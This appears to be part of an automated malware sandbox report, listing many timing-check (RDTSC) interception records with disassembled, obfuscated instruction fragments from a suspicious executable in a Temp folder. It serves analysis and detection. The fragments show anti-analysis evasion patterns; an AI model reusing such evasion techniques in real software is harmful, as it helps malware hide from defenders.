                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB3BA second address: 3AB3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 stc 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F4784F102CAh 0x0000000f jo 00007F4784F102CCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AB8E2 second address: 3AB8E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADDA1 second address: 3ADDB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4784F102D1h 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADDB6 second address: 3ADE3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F4785B0BF57h 0x0000000f push esi 0x00000010 jmp 00007F4785B0BF4Fh 0x00000015 pop esi 0x00000016 nop 0x00000017 call 00007F4785B0BF59h 0x0000001c push ebx 0x0000001d cld 0x0000001e pop esi 0x0000001f pop esi 0x00000020 push 00000000h 0x00000022 jp 00007F4785B0BF4Bh 0x00000028 call 00007F4785B0BF51h 0x0000002d jmp 00007F4785B0BF51h 0x00000032 pop edi 0x00000033 push 00000000h 0x00000035 call 00007F4785B0BF4Ah 0x0000003a add dword ptr [ebp+1246B792h], eax 0x00000040 pop edi 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADE3E second address: 3ADE42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADE42 second address: 3ADE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADE48 second address: 3ADE4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADE4E second address: 3ADE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADE52 second address: 3ADE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4784F102D0h 0x00000017 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3ADAD3 second address: 3ADAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AE933 second address: 3AE937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFE36 second address: 3AFE3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFE3A second address: 3AFE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFE40 second address: 3AFE46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFE46 second address: 3AFE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFE4A second address: 3AFE4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B0821 second address: 3B088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4784F102C6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F4784F102D9h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 sub edi, dword ptr [ebp+122D2B94h] 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+1246B792h], edi 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007F4784F102C8h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov esi, dword ptr [ebp+122D1C79h] 0x00000048 push eax 0x00000049 js 00007F4784F102E3h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B05CA second address: 3B05D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4785B0BF46h 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B05D4 second address: 3B05E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B2EE8 second address: 3B2EED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B3465 second address: 3B3469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B3469 second address: 3B346F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B4523 second address: 3B4533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3AFBBD second address: 3AFBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B5506 second address: 3B550D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B478B second address: 3B4798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6570 second address: 3B6574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6574 second address: 3B6582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B5765 second address: 3B5769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B5769 second address: 3B5774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F4785B0BF46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B5844 second address: 3B585A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4784F102D2h 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B585A second address: 3B585E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6582 second address: 3B6586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6586 second address: 3B658C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B658C second address: 3B6592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6592 second address: 3B6596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B6596 second address: 3B661B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D38EEh], edi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F4784F102C8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F4784F102C8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 or edi, dword ptr [ebp+122D2DA4h] 0x0000004d pushad 0x0000004e call 00007F4784F102CEh 0x00000053 jbe 00007F4784F102C6h 0x00000059 pop edx 0x0000005a jnl 00007F4784F102C9h 0x00000060 or bl, 0000005Dh 0x00000063 popad 0x00000064 xchg eax, esi 0x00000065 pushad 0x00000066 jl 00007F4784F102C8h 0x0000006c push eax 0x0000006d push edx 0x0000006e jc 00007F4784F102C6h 0x00000074 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B661B second address: 3B6640 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4785B0BF57h 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B754D second address: 3B7551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B7551 second address: 3B75BE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+1246CE51h], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F4785B0BF48h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov di, cx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F4785B0BF48h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d or dword ptr [ebp+12493A3Ah], esi 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F4785B0BF4Fh 0x0000005d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B75BE second address: 3B75C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B75C2 second address: 3B75C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B93B2 second address: 3B93C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B93C8 second address: 3B93CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B93CE second address: 3B93D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B93D2 second address: 3B9426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call 00007F4785B0BF4Fh 0x0000000e push esi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F4785B0BF48h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d push 00000000h 0x0000002f mov ebx, 7BBB3ACFh 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jns 00007F4785B0BF4Ch 0x0000003d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B9426 second address: 3B942B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BB40E second address: 3BB412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BA5B7 second address: 3BA5C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BA5C3 second address: 3BA648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F4785B0BF4Ch 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F4785B0BF48h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F4785B0BF48h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 jg 00007F4785B0BF4Ch 0x00000056 mov eax, dword ptr [ebp+122D0FF1h] 0x0000005c mov bx, 0DCEh 0x00000060 push FFFFFFFFh 0x00000062 mov di, CDA3h 0x00000066 nop 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BA648 second address: 3BA64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BA64C second address: 3BA650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BB5F2 second address: 3BB610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F4784F102D1h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BB610 second address: 3BB624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4785B0BF4Dh 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BB624 second address: 3BB628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BD4A4 second address: 3BD4AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BD4AA second address: 3BD524 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4784F102C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F4784F102C8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F4784F102C8h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007F4784F102C8h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 00000016h 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d mov edi, dword ptr [ebp+122D2B5Ch] 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BD524 second address: 3BD528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BD528 second address: 3BD542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BC6E7 second address: 3BC6EC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BE419 second address: 3BE491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 jnc 00007F4784F102D4h 0x0000000d nop 0x0000000e xor dword ptr [ebp+122D1EF7h], ecx 0x00000014 push 00000000h 0x00000016 jmp 00007F4784F102D2h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F4784F102C8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov ebx, edx 0x00000039 add dword ptr [ebp+1246AA2Bh], edi 0x0000003f xchg eax, esi 0x00000040 jo 00007F4784F102CEh 0x00000046 ja 00007F4784F102C8h 0x0000004c push eax 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push esi 0x00000051 pop esi 0x00000052 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BD74B second address: 3BD74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3BD74F second address: 3BD753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3C16B4 second address: 3C172D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F4785B0BF48h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+122D1B89h] 0x0000002c push 00000000h 0x0000002e pushad 0x0000002f mov edi, eax 0x00000031 or edx, dword ptr [ebp+122D2AC4h] 0x00000037 popad 0x00000038 call 00007F4785B0BF4Bh 0x0000003d pushad 0x0000003e mov di, 3A8Fh 0x00000042 add dl, FFFFFFC4h 0x00000045 popad 0x00000046 pop edi 0x00000047 xchg eax, esi 0x00000048 jmp 00007F4785B0BF59h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 pushad 0x00000052 popad 0x00000053 pop eax 0x00000054 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3C2613 second address: 3C2617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
